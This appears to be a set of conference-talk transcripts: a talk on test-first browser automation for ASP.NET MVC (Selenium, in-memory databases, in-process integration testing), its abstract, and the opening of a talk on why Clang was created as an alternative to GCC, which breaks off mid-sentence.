passed. While you are working on that, you have to implement different layers in an outsidey matter. So first UI, then the controller and whatever, just go deeply into your application where there are some iterations with TDD or with just some other iterations. And this is the way how you at the end get to the testing end-to-end test. Then just like in TDD, there is a good time to review what you've done and do a refactoring step and then you can move forward. But of course, you can in the meanwhile have some deployable version of your application. So this is what we would like to do and this is what we would like to do together with browser automation. So let's not try to integrate the entire UI into our development lifecycle. Okay, why is this good for us? So why do we want to do our test-first development through with browser automation? On one hand, because I love test-first, but on the other hand, there are more stronger arguments as well. First of all, this is providing the real outside-in approach. How many of you have heard about feature injection? Only a few. Yeah, feature injection and outside-in approach is basically a way how you develop your application starting from the user's lead and go deeper and deeper in your application. With this outside-in approach, you can basically ensure that you really just implement what is really required at the end for the user on one hand and that you are implementing it in a way that is comfortable for consuming by your users. If you skip the UI and the browser aspect of your application and it can happen that you implement something even in the control layer, that will be not used or not used in a way how it's comfortable for consuming it from the web page. So this is a danger which you can avoid if you do test-first through the UI automation. The second is that it's a little bit related to the modern web applications where HTML5, five semantic markup and so on. If you think about this a little bit more in detail, then you will see that the HTML code is not as much part of your design anymore, but it's more part of your domain. So you have some structured semantic elements inside your HTML. You have some well-thought ID, class names and so on inside your HTML. The CSS is doing the design part for that, but the HTML part contains a lot of domain terms and parts of your... It can be, in fact, part of your domain model. However, if you develop this HTML part somehow separately from your application in the control layer, then it can happen that you are just basically building up two different worlds, two different terms, two different domain models. If it's good, then it's matching, but if not, then there is a gap which is causing some problems with that. If you do outside-in, then the flow is much more natural, so you don't have this problem that you are building up two different worlds that might be inconsistent. And of course, it's a kind of indirect argument, but if you do test first with browser automation that you are forcing yourself to establish a model that is fast enough. If you spend, I don't know, 15 seconds to run a test because you are just having some very complicated IS setup and browser execution and whatever, then you will not be able to do test first. So it's somehow forcing you to think about performance from the beginning in terms of the development workflow. So this is how this could be done. Okay, so far for the introduction, let's jump into the demo part. And in the first part, I would like to show you, give you a little bit of impression how these test first could be working with browser automation. And for that, I will see three different approaches and try to compare them. And the first approach is not the browser automation, it's a classic control-level testing. I will use this as a benchmark to compare the others with that. And the other will be pure Selenium web driver implementation. So no additional tools or frameworks on top of that, but just the pure Selenium web driver API course. And let's see how this can, and at the end, I will have a third one somewhere in between, but let's pick these two first. And for that, I will implement a new scenario inside our application, which is, let's say that we want to show some trends page where we want to show the tags attached to the different fashions ordered by the popularity. Okay, so this would be a spectral scenario that is related to that. So show a popular tags. I have some questions with some tags attached. And if I go to the trends page, then these are the tags that are displayed in this order. So this is the exercise that we want. This is the feature that we want to do with the different automation models using test first. Now, to save some time, I have pre-recorded these implementations because now I can play it in a little bit triple speed, I think, because otherwise it would be too slow. But my goal is not to show you how to type, but it's more to show you how the, what is the impression, how it feels to do test first development through the UI. Okay, so the first one will be this controller, which is not even web development at all, web automation at all. And what you can see is that I have just a simple test class and the test method inside. Right now, for the sake of simplicity, I will implement this automation in a single test method and not through spec flow, because then you will see it's a little bit more condense and it will be easier to explain through this demo. In reality, I usually do this in spec flow step definitions. So what you see here is just an empty test and let's get started. So the first thing that I usually do is, if I able to start it, yeah. Somehow fix the video. Okay. Whatever. So the first thing that I usually do is I'm making a to-do list, so I'm just planning what I will do inside this test. So in this case, I decided it's not well visible, but what I decided is that I will just invoke the test control, transcontroller.index. Now I will just grab the actual text from the model data and I will do the assertions for that. And when I'm ready, I have a failing test, then it starts to implement these things. Data preparation I have already done. Now I have started to create a new transcontroller, it's an empty transcontroller with an empty index action. This is pretty much what you usually do if you do TDD. Then you are trying to access the model. The action is still empty, so this will probably not give us anything just now. So probably we would have a narrative exception when I execute this test. Then I just realized that I need a list of tags somewhere inside. Then I move forward and I realized that I need to have three tags, so I start to implement some logic which is just splitting out the tags. And when I move forward, I'm just having more and more implementation for that. So this is basically the way how you can do control automation testing before. So let's see how this looks if you try to do Selenium automation or Web browser automation instead. Again, I have some to-do lists of what I will do and it's pretty much similar what we have with the control automation but also different. So instead of calling just the index action on the transcontroller, right now I'm navigating to the trans page. And instead of grabbing the data from the model result, I just parse the HTML to get back the list and then I have the assertions afterwards. So let's try to see this how it works. I will again not play it fully through but just to have you get your impressions. So first I somehow ensure that I can start the browser and I implemented in the setup call and then I navigate to the URL with the Web driver, navigate, go to URL method and then finally I realized that for that I need to make an assertion for example how the title is called, then this assertion fails because I'm not sure because we just have a yellow screen right now. Then I implement the empty controller. This will again just provide us yellow screen because there are no view yet. Then I implement the view. Then it passes so I can move forward. I'm just trying to grab the data from the page. Now this is the time when I start to think that, okay, how is the control will be called which will hold the text. I just realized, okay, I want to have some element which is having the ID called tags. So I started to think about how the domain will work of this particular page. I have nothing implemented in the controller yet. Then when I try to grab the text from this list, I have to think about how do I get the list type, how do I get the individual text from the page. So how my page will be structured. And I just move forward and then I will realize that to actually get the labels of the text and the numbers, I have to have some more glen rule markup inside my HTML to fulfill that and so on and so forth. And once I have that, so once I have a really get to the point where I need to implement something in the code, I already have some imagination how the page model will look like because I already know what is required from the end users when they want to see the page. And it will be much more straightforward to implement the controller and the action method for that. Okay. So this is just to give you some impression how it feels. So it really starts from the UI and then goes in more into the controller and implementation. There are some things in the mean by in Bitveen as well. How many of you have heard about KoiPoo? Not too many. Okay. How many of you have heard about Kappibara in Ruby space? A few of you. Yeah. So Kappibara, so KoiPoo is basically the dotnet port of Kappibara and all these tools are others as well. All these tools are responsible. All these tools are trying to give you a nicer API on top of Selenium. So you have seen that making a URL, making a navigate to methods was quite complicated in Selenium. We have to go to navigate, go to whatever full URL. If you want to click a button that is also in Selenium or in the web drive interface is several different calls, these tools like KoiPoo is trying to give you a nice usable fluent interface on top of the Selenium web driver. I think it's pretty good. But I will not pick that. The other thing that we are also using quite often is the page objects. How many of you are using page objects or the page object pattern? Yes, some of you. The page object pattern is also very good way to automate pages. It's a different approach from KoiPoo because KoiPoo is trying to simplify the user interaction. On the other hand, page objects are giving you a way to declaratively describe how your page will look like. On one hand, this will help you to implement the page and on the other hand, it will help you to automate the page. So this is another approach that we are using quite often. However, here we are having ASP.NET MVC applications and these MVC applications have a lot of different conventions that they are using. For example, the URL is coming from a convention or if you are using the editor form helper method that is creating you an input with the ID named after the property you have and so on. So the question is why can't we use these conventions also when we are trying to automate the UI? And actually, when we realized it, we have also started to implement some small interface on top of Selenium where we could express the browser automation terms like getting back an input or going to URL with Selenium but in a way that is using the ASP.NET MVC conventions and the, for example, the routing, the model binding and so on. So the tests are becoming more clear and it will be much more easy to make any refactoring afterwards. However, recently I figured out that there is a better tool than the one which we have implemented for our own so I would rather show this one. It's called specs for MVC and I'm pretty sure that there are other tools as well so but I think this is a good example for showing that. To give you an impression how specs for MVC works, specs for MVC is also just something on top of Selenium web drivers so if you have a Selenium web drive implementation specs for MVC will work with that so it doesn't build up yet another automation infrastructure. However, in specs for MVC, things like this navigate statement which was looking like this in a classic Selenium can be expressed in a way like app.navigate to home controller.index. So basically you were able, I was able to use my class names and metal names to be able to do browser automation. This is the way, of course you can always step back and do low level Selenium automation as well so it doesn't hide you or close you out of that but the simple things that are, that having matching terms in the MVC world are easier to handle. So let's see how this works with test first way. So again I will have a, oops, I will have a to-do list what I'm going to do. Doesn't matter, it has already started. So basically I navigate to the page but since specs for MVC giving me this tied interface even without navigating to the page I have a chance to think about how my controller has and how my actions will be called afterwards. Then I will do the same type, title assertions that I, assertions that I did with the Selenium case so I asserted that the title should be called trends and of course this will fail because I just have a yellow screen so I need to implement some simple view for this, for this, for this page and set up the title and this will pass and I can move forward. And the next thing which is interesting will be when I try to grab the list of page, the list of text from the end result page. Here again specs for MVC gives me a helper method called find display for and display for. I just wait until it's finished, yeah, just zoom in. So what it does basically is using again the conventions of MVC and basically I had the chance to start thinking about how my page model will look like. So I just decided that, okay, I will have a page model like trans-page model and inside the trans-page model probably I need the list of text because I need to display that. So I just expressed the access for this named URL list through the domain model terms that I will implement. And if I go forward then of course I can implement my page model and add the text property and so on and so forth. So this is again just giving you an impression how the flow works. So even though that I'm doing browser automation here I'm just somehow forced to think about my full domain model together with the HTML and the back-end model. So it's much more, much more, there will be much less gaps between the HTML model I use and the domain model in the back-end. So in the download side of this talk you will be able to download these videos and you can watch them through fully. Interestingly, with the three different techniques not exactly the same implementation came out as a result. Of course they were not too much different but they were slightly different and it's quite interesting. And this is a small summary page for this result and the top is not visible but it doesn't matter. And this is how you can analyze the differences between the three different models. So I'm just put next to each other the different ways how you can express the same things with the different automation techniques. And what you can see from here is that by using the spec for MVC or any other MVC-based framework on top of Selenium you can express very similarly the things how you could do in a control level. So it's much easier to write this as you don't have to deal with the string literals and stuff in that. Also to access the page model it's quite easy. And as you can see you can always switch back to the Selenium web driver interface if you need or there is no real matching for that in the MVC terms. Of course, analyzing the web testing strategy, for analyzing the web testing strategy this is probably too easy example. So usually I'm doing at least three examples. One is a read-only case like this one was. I also do an edit case so filling out a form and successfully submitting it. And maybe it was a case where you are just submitting the form but there is some validation error or either business or any other input validation error. I think if you at least do these three or you just pick a few other important use case from your application then you can have a quite good feeling how the different techniques would fit to you or to your project. And then you can make some kind of summary out of that. My wife is always marking the cooking recipes with one to three hearts depending on how much we liked it. So I just borrow this pattern from her and I was trying to make my own fully subjective results for that. I think there are not too much interest, not too much extraordinary things in that. Maybe the only interesting thing is this good design. By the way, these different aspects are the things that you should think about when you are analyzing any of the strategy that you come into. How much it helps you to make good design? How much it helps you to make a clean test? How much it helps you to keep to make a clean HTML? And how much, how stable it is and how much it is? So maybe the only interesting things is the good design where the control lever just got one heart which you might argue with. But actually this is coming from the fact that it's not doing full outside in. So actually, even if you are doing something in the control lever, you might want to end up, might end up with something which is not convenient or not exactly fitting to the user's needs. Cool. So this is how this test first is at least can be analyzed when you do, when you do browser automation. The next thing is this outprog versus improg testing thing. And here there is the other heated discussion where you're mocking or subbing is good or bad in terms of test automation. So how much you can cheat and how much you cannot cheat? And of course there are some cases where you, it's simply not possible to test something in a full integration if you have some complicated auto-attegationable or email sending or whatever else or time dependency. Now you have, if you want to make an automated test for that, you have to mock it out or stub it out. However, in some other cases, you also might want to consider using the mocks or stubs in a case, for the case of improving the testing efficiency. I think testing efficiency is very much, very important concept and you have to always keep in mind, especially in the beginning, why you have a chance to change the things. So, and I think it's completely valid to make the mocks or stubs even for improving the testing efficiency. But of course you have to always consider what are the consequences for that. So as an example, I will try to show you how you can use in-memory database for testing. I think testing with in-memory database is quite a popular way to speed up your test, especially if it's a data-intensive test. So let's try to do that. In-memory testing can be done very well with SQLite and in some sort also with SQL-CE it's almost in-memory. However, in my case, I will just have a very dummy implementation of my entity framework dataset. So I will just replace that to show this in my tests. Fortunately, I have autofoc already configured for my test and right now as you can see as I spec over flow entities interface, which is the interface of the DB context, I have registered my entity framework DB context here and I can just change this to use in-memory, the in-memory version for that. So this is how I will show you how this could work. And for that, I will show you two different tests. One is this classic controller test. I'm just running it. And let's see some basic Selenium tests for that. This test are just testing the website in a way that given there are some questions on the database, if I go to the home page, then I should see these questions on the home page. So let's run this Selenium one as well. This is not yet the in-memory database, so just to make sure that it works. It pops up Firefox and it runs pretty slow. It's eight seconds, but okay right now. And let's try to speed it up and let's try to make it in-memory. Now, if I just change the dependencies and recompile, let's run the controller test, which should silver fine instead of three seconds now we have two. Of course, this application right now doesn't have too much data. But if I try to run the Selenium test, then what do you think what will happen? Here you can already spot it out from the Firefox screen that actually it was empty. And actually we get an exception that we expected two or three questions, two questions to be listed on the web page, but actually we got only zero. We got nothing on the web page. What happens? To understand that, you have to understand a little bit how the process model works in our testing environment. So right now in the input testing, we had the test process, so the end-unit, run-er, whatever you use. And basically you had the test in there and it was just making an instances of the application. The application was accessing the database. You could make, you could grab the results, make some assertions on that, and so on. Then when we were changing the implementation to some mock implementation, and this small explosion mark means a mock or a stub in the application. So basically we have introduced the in-memory implementation of our database access layer, and both the test and the application was going through this in-memory implementation layer. That's why it was working. Of course, if you have this situation, you cannot only just mock out the database, but you can do any other tricks with your application. You can replace any other dependencies or inject something on that. And so you have full control of that because you have shared memory and you have full access to your applications stack. However, in the browser testing, what happened, we were just going through the browser and the browser was accessing our application which was sitting inside the IS or IS Express. Until we were doing the automations through the database, this was all fine because our tests were accessing the database directly. So they were inserting those records directly into the database. However, when we have introduced the in-memory database, when we executed the tests, since these were running in a different process and different app domain, actually we had another copy of that in-memory database. And since these two processes are not sharing the memory at all, actually we had two in-memory databases in our hand. And therefore, even though the test process has inserted two records in this copy of the in-memory database, the IS was not seeing that, so that's why our test was failing. Okay, is this clear? Good. So it's just a simple concept that it's a simple idea, let's switch to in-memory database because everyone is talking about that. But if you try to apply it into a browser automation scenario, this becomes pretty hard. And of course, if you have other things like complex mocking or stubbing scenarios, you might have the same problem as well. So what we can do about that. So what would be the great thing, but this is unfortunately just a wish, is actually to not have this IS at all, but just run our application inside our test process. Just like with the in-proc scenario, just we can go through the browser, that's not a problem. But I want to have my application hosted in the same process like we are, because then we can do the same mocking and stubbing that we want. And this in-memory, for example, is in-memory database scenario would work. Well, actually, this is, in some cases, this is possible. So for the infrastructures that are already using OVN, OVN is a general standard for hosting web applications. And for example, Web API or Nancy or Vnext will use this. This is already possible. So you can try to host your application inside your testing process, at least in some sense. However, for example, for ASP.MVC, this is not possible yet. So this is still just a wish. So how could we just some, how work around it? By the way, if I would have the same test process that I could even include the browser as well and have some fully in-memory, in-proc browser, which would make it super fast. So how could we solve that? And one very crazy idea, which I would never use in production, but just to show you how these things can be implemented is to try to put your tests inside the application. So instead of moving the application into your test, let's try to move the test into the, into the, into the IS process. This is a little bit similar to how you do browser or how you do mobile device automation. There are some, something that is deployed together with your application to the device to be able to do testing. And actually, this sounds crazy, but it's not that complicated. So what I did, I just implemented a small ASP.MVC controller. I call it integration test controller. And this, what this integration test controller does, it is just actually calling the end-unit runner runtime. It's a.NET stuff, so you can just load it into the memory and run it. And just run the tests which are provided as a class name to your input. So to test this, I can just take the sample URL, where I've just specified this Selenium beta. So the tests that were failing here. And let's try to run this in the, in the browser instead. So I'm just pasting this URL. And hopefully, if it works, yeah, okay. Then what you can see is actually, end-unit was running inside my, my web application. And it was running my tests. And it was passing. So the same test that was failing when I was running it from Visual Studio, because then it was running from a different process. If I just host it into the IS process somehow, it's passing. And you can also see that it's also faster, even though that right now this was bringing up Firefox in the meanwhile, it was just too fast. So this is one way, probably not in production, but just to imagine how this could work or what would be some alternative scenario. And in some cases, there were some, some alternation, you can have that. Of course, you can have some kind of small test controller test, which is just calling this, like what I did with the browser, just invoking this URL and checking the HTTP result or the content and just passing or failing depending on the test has passed or failed. But this will be just some, some tiny controller method for that. So this is, this is a crazy idea, but just to show you what would be a more ideal scenario if, if our tests and the application was running, running the same process. However, there is another solution for that. And this is based on Steven Sanderson's article, I think four or five years ago. So it's quite, quite old article. How many of you have heard about this MVC integration testing framework? It's not really a framework. Only a few. So this, this framework or this, this way how that, that, that Steven Sanderson has, have described is actually using some infrastructure of the ASP.NET framework itself, where actually ASP.NET and MVC is bound to IS, so therefore you cannot just host it in, in proc, at least in your app domain, but, but there is a hook to be able to host ASP.NET inside your process, but just in another app domain. Okay, so this is, this is possible with the, with the way how Steven Sanderson describes that. And he even created a small implementation and he was just calling it MVC integration testing. So there are multiple variants and folks of that. If you search for this term, then you will find a lot related to that. But basically what it does, it just creates this new app domain, which is an IS-like app domain, which is hosting your application and, and also your tests. And basically it just has a small controller outside, which is, which is communicating with tests through, through remote thing. And there are some quite interesting infrastructure used for that, which I will not explain in detail. But this is the core essence of that. I will just show you in a, in a, in a second. One other thing that's, that is interesting with this MVC integration testing framework that actually is not using the browser. So that the requests are not going through the browser, but just below the browser. So directly into the ASP.NET MVC, or ASP.NET runtime, you can still, you have to still use the URLs and HTTP requests, but just not, not through the browser, which is having a funny benefit of that. You can also access some states, for example, the model state of the action result of your, of your ASP.NET MVC action. So this, I will show you how, how this, this could work. So just switching back to my Visual Studio and to the MVC integration framework sample. By the way, all these code samples will be provided. So you can go ahead and, and play with that also at home afterwards. So, so basically the beginning is pretty much the same. So I'm just inserting some data to the database. However, and this is where the MVC integration test framework starts. There is a call apphost.simulate browser, browser session. And here I have to provide a delegate. And inside this delegate, I can make some fabric request like get and, and, and whatever, and I have access to the, to the HTML response text. And I also have the access to the, to the view result. So I can just grab out the model as well. And the trick is that this delegate, which is inside here, will run in the other app domain. It will run in the app domain, which is hosting my application. Everything else is running in the test app domain, but, but this delegate inside is running inside the test app domain. So if I would run that, then this is still failing. This is failing because this, given the following questions registered. So the, the one which is just entering the data into the in memory is not inside this scope. So this is running in the test app domain and not, not in the app domain that is hosting the, the, the application itself. But if I just move this in inside this delegate and rerun the test, then, then it just gets passing hopefully. Let's see. Yeah. So, because this is, this all code is basically running in the same app domain, shared memory, whatever, like the application. So you can do all the tricks that, that you could do with the, with the in memory case. Actually what I could do, I could move everything inside this delegate. So, so actually I could change my tests in a way that, that there is just this outer layer and everything is inside this delegate and then I would have a very, very similar feeling that, that you would have with the in memory case. And I think this MVC integration test framework, the concept is, is quite interesting and we are using it quite often in our applications. This is a very good compromise between, between having a control layer test and the, and the full browser automation test. I think it's pretty, pretty interesting and it makes sense to, to look at it. The, the bonus track is that since it's, with spec flow plus runner, so we have actually a test runner, the test runner that you have seen here was actually not the MS test runner, but this was our own test runner. And if you think about this scenario that I was mentioning that everything is, that I would move everything inside the delegate and actually the test method is just a thin, this is just a thin layer about around my, my testing code. You could think about that maybe this, this wrapping could be also injected with, with post-sharp or something like that. And, and following this, this thinking, actually you can also think that, okay, the test runner framework could also wrap this around. So please, test runner framework, please wrap all my tests with this similar browsing session host and then I don't have to care with it. And this is how, what we have implemented at least in a, in a some kind of preview or very awful mode. So actually our test runner is now able to create this small controller and actually the same scenario runs like, like with the ASP, then we see integration testing framework, but just the difference is that, that the tests are before execution, before executing the test, they are actually hosted on that app domain that is actually hosting also the application. So with that, you, you get the full, the same feeling like the in-proc testing with the end unit hosted inside, without this hex around hosting the end unit runner inside your application. So I just quickly show you that one as well. So, but it's not that much visible because from the test what you see that is pretty much the same as it was, like the Selenium test, you don't have any special hooks, any special delegates, it's just go saves the data to the database, goes to the controller, this one is using the specs for MVC and doing the assertion in the database. One bonus thing is that just, just like with the MVC integration test framework, here I also have access to the model state. So I can just, I can decide whether checking what kind of texts are listed in my page, I can think what is more efficient, whether I'm just grabbing it from the HTML result or whether I should just access the model data that was returned by the, by the control action itself and or you can do both, like in this case. So right now, this, the same assertion is done on the HTML level and also on the model level. So this is what I can run. I just have to tell this spec flow runner to, to go to the, to use another settings and just, just disappeared from my, from my list. So that it should use this web execution settings and the, and if I just run this test then somehow what I did, I moved around the things. Okay. So if I run this test, hopefully builds, then actually this will pass. So it will use the in-memory database and, and also it's running in the same app domain. So you also get some performance benefit. But you can also see that this is now two seconds. So it's like the pure controller layer testing was. Okay. This is on one hand caused by, because we don't have to go cross app domain. So everything is hosted in the same place. So no overhead is, is attached to that. And the other thing that I have used is I, I was using here now a headless browser. I could use the, the Fontome GS headless browser as well. This is a great product and I love it. And I really, I, it's now very easy to use it in.NET. You just add the Nougat package, phantom.gs.exe and, and configure your Selenium to use phantom.gs instead and it works. So it's, it's very fantastic. However, there is another tool that I didn't mention yet, which is called, which is called, where is my set? I'm going to go wrong test. Which is called Simple Browser. Have you, have you ever heard about Simple Browser? It's an open source browser implementation. It's not supporting JavaScript, but anything else it supports very well. And it's written fully in.NET. And the benefit of that is that if you want to do some testing where, where you want to test a page which is not JavaScript intensive, that you can use this Simple Browser, which is also implementing the, at least the Simple Browser.WebDriver package, implementing the iWebDriver interface. And it's fully integrated in the same app domain and, and process. So it's a, it's pure.NET implementation of, of a very Simple Browser. If you want to have some fast and, and, and result, then it's absolutely makes sense to look at that. Okay. So, to wrap up this. So I think by ignoring mocking and subbing, because it's just saying that, oh, this is not good, because then you are lying, is bad, because then you are just basically ignoring a very important tool, your, to make your testing efficient. If you can make your testing efficient all together, it's, it's, I think it's very important to have a good project success, at least in our, our experience. This was, this was absolutely like that. In ASP.NET, this testing, this output, output testing is pretty hard. So, because you cannot, you don't have full control over the dependencies, over the components you have. Of course, you can do some back doors and you can do some hacks also through the Web API, but, but that's, that's pretty hard. So it makes sense to look around some tools that can help you. For example, this MBC integration test framework is very good, and especially in combination with, with things like the simple browser or the, or the Phantom GS browser, you can basically set up a very, very useful and productive way how to, how to test your application. And of course, Ovin and when VNex will come, then this will be, again, very important. So, to wrap up the session, what we had today, so actually, I don't know how much you have realized, but we, we had quite a long journey. So we have started from the Selenium Web Driver, and then we considered something like KoiPoo, which is a, which is a functional top-on, top-on, on the, on the Web Driver interface or the, or the, the page objects, which is a declarative way to declare, to use your page. And actually, you can also see that the specs for MBC or this concept by using your, your model object terms and actions and contours is some kind of in-between solution for this, or just combining the benefits of this, especially for, for MBC application. Then we were considering how to, how to make the testing more efficient with, with mocking and stubbing. And then we have seen that on one hand, you can solve this old prog testing problem by hosting your test inside the application, this end-unit-inside, the web application approach, which I would never, probably never use in reality, but at least to understand the concepts, I think it's very important. Or the other one, which we are really using quite heavily is this MBC integration test framework, which is providing you more or less the same with a little bit of, only a little bit of overhead, but on the head with a big benefit that you can also access the model data and the validation data. So if you don't want to grab back the validation messages from the UI, then you can also access it from the validation context of ASP.MBC and just make the assertions against that. And there are quite much possibilities that you can do with that. And right now for us, we were also trying to implement this into our own runner, at least as an experimental stuff that, that it tries to avoid this, this overhead of, of using this delegate with the MBC integration test framework. I'm pretty sure that you can also do this, we do this for example with PostSharp. I'm pretty sure that with PostSharp you can also wrap your, your methods automatically with, with this delegate cause. Okay. So this was what, what we have seen in the first part. We were focusing on the test first and the other in this, this steps and marks. Yeah. Conclusions. So I think there are three things that, that you should, you should keep in mind. The first thing is that this step testing topic is changing. So don't stuck to your decisions and your thoughts, but just reevaluate everything in every year or every two years because probably you will end up with different results. So I think this is a, this is a topic where you cannot make stable decisions. So if everyone is watching this talk in 2014 or 15, then they should be very careful about my statements. So the other is that you have to define a test, a testing strategy which is supporting test first. Actually this is two statements. One is that you have to define this testing strategy. I've seen many times the problem that, that the team just started to do testing and produced hundreds of tests and then realized that what, how they are doing is absolutely unstructured and there is no concept behind that because they think that, okay, the test is just some second level citizen in your code. But this is wrong. Please take your time until you have only a few tests and consider different alternatives and try to find a strategy that fits best to you, to your team, to your project, to your requirement and to your environment and whatever else. And do this until before you have tons of tests because otherwise it will be very hard to make any changes. And of course, I think if you try to make the strategy in a way that it supports test first, then you get really a lot of benefit for this modern VC application. And the last thing is that really there is no single tool that supports you for every, for everything. So when you are trying to define your strategy or, or fine tune that, you really have to look around and, and, and see many tools that, that can support you. Be open minded in that. Try as many things that you can do and try and do find the best combination of tools that, that fits to your project. Unfortunately, this is the only way today how you can do that. There is no single tool that, that would solve every, every problem. I think that, that the, the web driver interface should be any way core of these tools. So I think whatever you use, try to, try to find a tool which is either from the browser side or from the, from the API side supports the, the web driver interface because I'm pretty sure that this will be the, the topic of the next, next years. Good. As I mentioned, there are, here are the resources. All of the resources can be found in this, in this page. I try to find the bit.ly URL that you can remember. So it's and, and you see 2014 GN, GN is my initials. So probably this is something that you can remember. All of the links, the videos, the source code is published there. So you can just download it and, and, and play with it. I have already uploaded it. So the links should work already. And, and, and make up your mind and try to define your own strategy. And I, I wish really a good luck for that. But before I close, do you have any questions? Yep. Yes. Yeah. Yeah. I just didn't want it to blow your mind with yet another tool, but yes, it's a good spot. So actually in, if you, if you use the MVC integration test framework, that is not, not listening to any HD, any port, any TCP port. So that's, that doesn't have a web framework or whatever on top. But what you can, it just, it just puts, gives you an API where you can send an URL and the header collection and so on. However, what I did and what you can do is that there are plenty of very simple HTTP, HTTP hosts or HTTP listeners out there. So I just created a very small HTTP listener, which is basic, it works like a proxy. It just accepts the request and routes through the, the MVC integration test framework API. It's quite complicated. If you, if you check out the, the source, you will also find this one, but this, this was the trick. So there is an additional mini framework, which is just used to be able to do browser, browser automation through the MVC integration test framework. Any other question? You all want to go for lunch? Okay. Thank you very much. I will be here around. So if you have any questions, just come by to me. Please don't forget to give feedback for this talk. It's very important for me to hear about your, your opinion. You can also write me an email if you like or dislike something in this talk and, and I wish you a good rest for the conference and, and have fun. Thank you. Thank You
|
Web application testing is a rapidly evolving topic, so year by year it is reasonable to enumerate the possible options and re-evaluate the web testing strategy you have chosen for your project. In this talk I would like to share what we have learned about web testing during our projects. I will show strategies and tools that have worked for us to address the different specialties of the different applications. (Did I mention already, that there is no one-size-fits-all solution in web testing?) You will hear about things like test-driven web development, problems and solutions of unit testing MVC controllers, efficient usages of Selenium WebDriver, but also about headless browser testing, parallel test execution, cloud testing and of course a bit of SpecFlow.
|
10.5446/50806 (DOI)
|
Welcome everyone. I was supposed to be on vacation today but one of my colleagues has asked me to talk about Clang and I changed my vacation plans to be here. I'm very much pleased to be here and very much pleased to talk about Clang. So I'm a software engineer at Cisco. At daily work I'm working with Graphical User Interface Team. We're making GUI for Cisco's telepresence end products. I spare a couple of hours every couple of weeks to contribute to Clang. So the software environment today, the software industry is going towards multiple directions. Cloud is an important part for example. So the servers and desktops are still dominating. We also have other key players in the market such as mobile phones, smart watches, smart TVs, gaming consoles, set up boxes and many other things. And of course each of these devices have different requirements. To satisfy these requirements we need to create better software and we need to create better tools. We need to enhance our programming languages and improve our workflows. And all this diversity requires a portability. You don't want to duplicate your code. You don't want to write it for each target. For example, in a video gaming engine you don't want to write your AI for PS, PlayStation, then for Xbox, right? You want to keep the same code. And as far as this portability is concerned, C and C++ still dominate. And they also provide a high performance. Industry has a great experience in C and C++ that can leverage delivering better products. There are not many C family language compilers in the market. We have Clang, GCC, Visual C++, Intel C++ compiler, Sampro which became Oracle Studio I guess, IBM Excel, a couple of more. But we're trying to talk about GCC and some problems that we experienced with GCC a few years ago and the reasons why Clang was born. We know that the world's code is compiled with GCC, right? Like Linux, all Linux distributions are compiling with GCC. At Cisco, we compile most of our code with GCC. Google is using GCC. If you want to compile Clang on Linux, you probably wouldn't need GCC because Clang requires a C++ 11 supporting compiler. And GCC is a little bit old, still younger than me, but it's 1987. I vaguely remember 1987. I vaguely remember the Black Monday. We also know that GCC is compiling many languages. That includes C, C++, Objective C, Objective C++, thanks to Apple's contributions. And Ada, Java, Fortran, any more? Do you know? D. Okay. Maybe more. Okay. That's recent, I assume? No, it was under first. Okay. And we know that it works because it's been around for a very long time. It's been in use by many companies. It's been used in different architectures. So we know that it understands the code. It generates a fantastic object file. So why do we need another compiler? First wrong answer is why not? And of course, that's not the answer. At the time when Clang was born, one of the reasons why Clang was born is that GCC wasn't generating friendly diagnostics messages. In some cases, they would just give you a set of tokens if you make, if you have a syntactic error. I'm going to show you some of the examples that you can see, other examples in various Clang-related talks. And GCC source code wasn't friendly either. I think before GCC 4.8, GCC was written in C and it had a very legacy C source base dating back to 87. And that's changed after GCC 4.8. But when Clang was born, I think the latest GCC was GCC 4.2. And its parser was doing constant folding. So given a code like this, GCC would generate an AST that would actually represent a code like this. And if you want to create a source base, a source level tool, this is not the answer. GCC is a rigid binary. It is not reusable. We can't separate GCC into individual parts and you can't reuse them for your own purposes. It has changed its license to GPLv3. And before that, you also remember that Apple has signed an agreement with Free Software Foundation and contributed Objective C and Objective C++ patches to GCC. But then GCC has changed license to GPLv3 to prevent what is called an anti-patent clause. And GPLv3 prevented its use by Apple, basically. All these problems combined have some implications. It cannot be integrated with ideas because it's one single binary. And there may be some licensing problems, too, that you might be distributing your own IDE with your own proprietary license and it's not compatible with GPLv3. It has no tooling support because you can't separate it into parts. As mentioned, you can't create source level tools for that. You can't create source-to-source transformations. If you want to format your source code, you would prefer something that understands the language to format the source code. Or if you want to query something in the source code, you would want a tool that understands it. You don't want to use grep. And GPLv3 prevents its use at Apple, in Apple ecosystem, basically. If I recall correctly, Apple has its own license when you ship something on App Store. Maybe somebody has made an App Store app here. Okay, that's not compatible with GPLv3. That being said, we're not enemies. We, Clang needs GCC to be compiled or a compiler to compile the Clang, but that's generally GCC. And we're trying to solve an engineering problem. We have a source code. We want to take that in, compile it, and generate an object file. There are some legal aspects of it. And these two projects have different goals. GCC is a free software foundation product. It's promoting free software and non-free, sorry, discouraging the non-free use of GCC. Clang is a VST licensed project, and it has different goals. So, El-Advian was a research project of Chris Lattner, who was then hired by Apple. In 2003, he has released the first version publicly. Before that, there were some other releases, but it wasn't 1-0. And it's released under a VST-like license, so it can be consumed by commercial entities very easily. And it was using GCC as a front-end, and it was named El-Advian GCC until El-Advian 2.9. This binary has been distributed. Overall, it looked like something like this. The source code comes in, GCC front-end picks it up, and generates an intramural representation picked up by El-Advian, and El-Advian optimizes it, and generates an output, basically. In 2007, Clang was announced. Clang is the C-language family front-end. So, this is Chris Lattner's original message to the mailing list. I'd like to read parts of it, which I think is important. It is built as a set of reusable libraries, and among other things, this means that El-Advian can now be used for a variety source-level analysis and transformation tasks that it wasn't suitable for before. Apple is an IDE, and they wanted to improve the IDE as well. And this serves great for that purpose. As I previously mentioned that the software industry has different requirements, we wanted to create tools that improve our workflows, and at the time, GCC wasn't really enabling that. So, Clang compiles C-family languages today. It's C, C++, Objective C, and Objective C++. The difference between the two is that we can use C++ and Objective C. Overall, this is not a precise picture, but the architecture would look something like this, source code will come in, and lexer and preprocessor will pick it up, convert it to a set of streams, then it goes to parser. Parser talks to semantic analyzer. Semantic analyzer creates nodes in abstract syntax tree, and then the abstract syntax tree will be processed by what we call a front-end action, and CodeGen is a front-end action that traverses the tree and generates an output by using El-Advian to emit the code. Today, it is supported on Mac OS, Linux, and Windows. Oops, it skipped too fast. I don't know the state on Windows. I never used it on Windows, but it's stable on Mac OS 10 and Linux. Some sanitizers don't work on Mac OS that I remember. They all work on Linux. When you watch a Clang presentation anywhere or read something about Clang, we like to brag about better diagnostics messages. It's often called expressive diagnostics. It's one of the strengths of Clang, and I personally like it a lot. This happened a few years ago where my colleague just called me over and asked what is 